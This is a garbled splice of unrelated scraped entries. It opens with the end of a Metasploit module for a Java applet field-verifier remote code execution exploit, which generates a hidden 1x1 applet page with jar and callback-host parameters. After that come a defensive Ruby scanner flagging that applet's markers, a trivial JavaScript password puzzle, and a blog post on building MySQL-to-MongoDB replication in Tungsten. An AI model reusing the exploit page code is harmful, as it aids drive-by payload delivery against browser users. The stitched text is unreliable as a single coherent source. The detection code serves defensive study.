              html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
              html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
              html += "</applet></body></html>"
              return html
            end

            def generate_jar()
              @jar_data
            end

          end

      http://packetstorm.crazydog.pt/1207-exploits/java_verifier_field_access.rb.txt

      Source: Java Applet Field Bytecode Verifier Cache Remote Code Execution ≈ Packet Storm
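For defenders, the markup built by `generate_html` in the module above has a recognisable shape: a 1x1 applet, the class name `cve1723.Attacker`, and a `<param>` whose value is a long hex string. The following is an added example, not part of the Metasploit module or the original post, that scans an HTML response body for that shape; the length threshold, the sample pages and the helper names are assumptions made for illustration.

```ruby
# Added example, not part of the Metasploit module: flag <applet> markup shaped
# like the page generate_html builds (1x1 applet, hex-encoded binary in a param).
HEX_PARAM_MIN = 512                  # assumption: minimum hex length worth flagging
KNOWN_CLASS   = "cve1723.Attacker"   # applet class name taken from the module

# Parse the attributes of one tag into a hash with lowercase keys.
def attrs(tag)
  pairs = tag.scan(/([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/)
  pairs.each_with_object({}) { |(k, dq, sq, bare), h| h[k.downcase] = dq || sq || bare }
end

# Name the file type from the first bytes of a hex string.
def payload_kind(hex)
  case hex.downcase
  when /\A4d5a/     then "PE executable"
  when /\A504b0304/ then "ZIP/JAR archive"
  when /\A7f454c46/ then "ELF executable"
  else "binary blob"
  end
end

# Return one finding per applet that shows at least two indicators.
def suspicious_applets(html)
  findings = []
  html.scan(/<applet\b[^>]*>.*?<\/applet>/im) do |block|
    a = attrs(block[/<applet\b[^>]*>/i])
    reasons = []
    reasons << "1x1 applet" if a["width"] == "1" && a["height"] == "1"
    reasons << "known exploit class name" if a["code"] == KNOWN_CLASS
    block.scan(/<param\b[^>]*>/i) do |param|
      pa = attrs(param)
      value = pa["value"].to_s
      next unless value.length >= HEX_PARAM_MIN && value.match?(/\A(?:[0-9a-f]{2})+\z/i)
      reasons << "param '#{pa['name']}' holds hex-encoded #{payload_kind(value)} (#{value.length / 2} bytes)"
    end
    findings << { archive: a["archive"], code: a["code"], reasons: reasons } if reasons.size >= 2
  end
  findings
end

# Constructed samples: a benign applet and one shaped like generate_html output.
BENIGN  = '<applet archive="clock.jar" code="Clock.class" width="200" height="80">' \
          '<param name="tz" value="UTC"/></applet>'
FAKE_PE = "4d5a" + "90" * 400        # constructed bytes, not a real executable
SUSPECT = '<html><body><applet archive="qZxTr.jar" code="cve1723.Attacker" width="1" height="1">' \
          "<param name=\"data\" value=\"#{FAKE_PE}\"/></applet></body></html>"

suspicious_applets(SUSPECT).each { |f| puts "#{f[:archive]}: #{f[:reasons].join('; ')}" }
```

The class name is trivially changed by anyone rebuilding the jar, so the size and hex-payload indicators carry the detection; the name only adds confidence when present.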
  20.
          <html>
          <head>
          <script type="text/javascript">
          function show_prompt()
          {
            var pass = prompt("Password?", "******");
            var pass1 = "rst";
            if (pass === pass1)
            {
              document.write("<p>The password is: " + pass + "! Bravo!!!</p>");
            }
            else
            {
              document.write("<p>Wrong! " + pass + "</p>");
            }
          }
          </script>
          </head>
          <body>
          <p>Password:</p>
          <input type="button" onclick="show_prompt()" value="Login" />
          </body>
          </html>

      What is the password? PS: Let the newbies try!
  21. The last article on this blog described our planned MySQL to MongoDB replication hackathon at the recent Open DB Camp in Sardinia. Well, it worked, and the code is now checked into the Tungsten Replicator project. This article describes exactly what we did to write the code and set up replication. You can view it as a kind of cookbook both for implementing new database types in Tungsten as well as setting up replication to MongoDB.

      The Team

      MySQL to MongoDB replication was a group effort with three people: Flavio Percoco, Stephane Giron, and me. Flavio has worked on MongoDB for a couple of years and is extremely well-informed both on database setup as well as application design. Stephane Giron is a replication engineer at Continuent and has done a substantial amount of the work on data extraction from MySQL, especially row replication. I work on the core execution framework as well as performance.

      Getting Started with MongoDB

      There were a couple of talks on MongoDB during the first morning of Open DB camp (Saturday May 7th), which Stephane and I dutifully attended to raise our consciousness. We got cracking on implementation around 2pm that afternoon.

      The first step was to bring up MongoDB 1.8.1 and study its habits with help from Flavio. MongoDB is definitely easy to set up. You get binary builds from the MongoDB download page. Here is a minimal set of commands to unpack MongoDB 1.8.1 and start the mongod using directory data to hold tables.

          $ tar -xvzf mongodb-osx-x86_64-1.8.1.tgz
          $ cd mongodb-osx-x86_64-1.8.1
          $ mkdir data
          $ bin/mongod --dbpath data
          (... messages ...)

      You connect to mongod using the mongo client. Here's an example of connecting and creating a table with a single row.

      This is schema-less programming in action. You just insert BSON documents (BSON = Binary JSON) into collections, which is Mongolese for tables. MongoDB creates the collection for you as soon as you put something in it. The automatic materialization is quite addictive once you get used to it, which takes about 5 minutes.

      The MongoDB client language is really handy. It is based on JavaScript. There are what seem to be some non-JavaScript commands like "show dbs" to show databases or "show collections" to list the tables. Everything else is object-oriented and easy to understand. For example, to find all the records in collection test, as we saw above, you just connect to the database and issue a command on the local db object. Collections appear as properties of db, and operations on the collection are methods. It helps that the MongoDB folks provide very accessible documentation, for example a SQL to MongoDB translation chart.

      I put together a little practice program using the MongoDB Java driver to insert, referring to the Javadoc for the class library when in doubt about API calls. There are also a couple of very helpful examples, like this one, included with the driver.

      All told, setup and orientation took us about 45 minutes. It helped enormously that Flavio is a MongoDB expert, which minimized flail considerably.

      Implementing Basic Replication from MySQL to MongoDB

      After setup we proceeded to implement replication. Here is an overview of the replicator pipeline to move data from MySQL to MongoDB. Pipelines are message processing flows within the replicator.

      Direct pipelines move data from one DBMS to another within a single replicator. They are already a standard part of Tungsten Replicator and most of the code shown above already exists, except for the parts shown in red. Before we started, we therefore needed to set up a replicator with a direct pipeline.

      We first built the code according to the instructions on the Tungsten project wiki, uploaded the binary to our test host, and configured the replicator. First, we ran the Tungsten configure script to set defaults for the MySQL server (user name, extract method, etc.). Next we ran the configure-service command to set up the direct pipeline configuration file. Both commands together look like the following:

          ./configure
          ./configure-service -C --role=direct mongodb

      The second command created a file called tungsten-replicator/conf/static-mongodb.properties with all the information about the direct pipeline implementation but of course nothing yet about MongoDB.

      Now we could start the implementation. To move data to MongoDB, we needed two new components:

      • A Tungsten RawApplier to apply row updates to MongoDB. RawApplier is the basic interface you implement to create an applier to a database.
      • A Tungsten Filter to stick column names on row updates after extracting from MySQL. MySQL row replication does not do this automatically, which makes it difficult to construct JSON at the other end because you do not have the right property names.

      To get started on the applier I implemented a very simple class named MongoApplier that could take an insert from MySQL, turn it into a BSON document, and add it to an equivalently named database and collection in MongoDB. I added this to the replicator code tree, then built and uploaded tungsten-replicator.jar. (Use 'ant dist' in the replicator directory to build the JAR.)

      To start using the new MongoDB applier, we needed to edit the service properties file to use this component instead of the standard MySQL applier that configuration adds by default. To do this, you can open up static-mongodb.properties with your favorite editor. Add the following properties at the bottom of the APPLIERS section.

      Next, you need to fix up the direct pipeline so that the last stage uses the new applier. We located the direct pipeline definition (around line 208 in the properties file) and set the applier to mongodb as shown in the following example.

      We then started the replicator using 'replicator start.' At that point we could do the following on MySQL:

          mysql> create table foo(id int primary key, msg varchar(35));
          Query OK, 0 rows affected (0.05 sec)
          mysql> insert into foo values(1, 'hello from MySQL!');
          Query OK, 1 row affected (0.00 sec)

      ...And within a second we could see the following over in MongoDB:

      This kind of progress was very encouraging. It took roughly 2 hours to get to move the first inserts across. Compared to replicating to a new SQL database like Oracle that's lightning fast. However, there were still no property names because we were not adding column names to row updates.

      Meanwhile, Stephane had finished the column name filter (ColumnNameFilter) and checked it in. I rebuilt and refreshed the replicator code, then edited static-mongodb.properties as follows to add the filter. First put in the filter definition in the FILTERS section:

      Next, make the first stage of the direct pipeline use the filter:

      We then restarted the replicator. Thereupon, we started to see inserts like the following, complete with property names:

      That was better, much better! To this point we had put in exactly 2 hours and 45 minutes wall clock time. It was enough to prove the point and more than enough for a demo the next day. The hackathon was a rousing success.

      Further Development

      Over the next couple of days I rounded out the MongoApplier to add support for UPDATE and DELETE operations, as well as to implement restart. The full implementation is now checked in on code.google.com, so you can repeat our experiences by downloading code and building yourself or by grabbing one of the Tungsten nightly builds.

      Restart is an interesting topic. Tungsten uses a table to store the sequence number of the last transaction it applied. We do this by creating an equivalent collection in MongoDB, which is updated after each commit. There is a problem in that MongoDB does not have transactions. Each update is effectively auto-commit, much like MyISAM table type on MySQL. This means that while Tungsten can restart properly after a clean shutdown, slave replication is not crash safe. Lack of atomic transactions is a bigger issue with MongoDB and other NoSQL databases that goes far beyond replication. For now, this is just how Tungsten's MongoDB support works.

      Speaking of things that don't work, the current implementation is a prototype only. We have not tested it with more than a few data types. It only works with a single MongoDB daemon. It does not set keys properly or specify indexes on tables. There are no guarantees about performance, except to say that if you had more than a small amount of data it would be quite slow. (OK, that's a guarantee after all.)

      Epilog

      Overall the hackathon was a great success, not to mention lots of fun. It went especially well because we had a relatively small problem and three people (Stephane, Flavio, and Robert) with complementary skills that we could combine easily for a quick solution. That seems to be a recipe for succeeding on future hackathons.

      From a technical point of view, it helped that MongoDB is schema-less. Unlike SQL databases, just adding a document materializes the table in MongoDB. This made our applier implementation almost trivially easy, because processing row updates takes only a few dozen lines of Java code in total. It also explains why a lot of people are quite attached to the NoSQL programming model.

      I am looking forward to learning a lot more about MongoDB and other NoSQL databases. It would take two or three weeks of work to get our prototype to work with real applications. Also, it looks as if we can implement replication going from MongoDB to MySQL. According to Flavio there is a way to search the transaction log of MongoDB as a regular collection. By appropriately transforming BSON objects back to SQL tuples, we can offer replication back to MySQL.

      There are many other lessons about MongoDB and NoSQL in general but it seems best to leave them for a future article when I have more experience and actually know what I'm talking about. Meanwhile, you are welcome to try out our newest Tungsten replication feature.

      Source: scale-out-blog.blogspot.com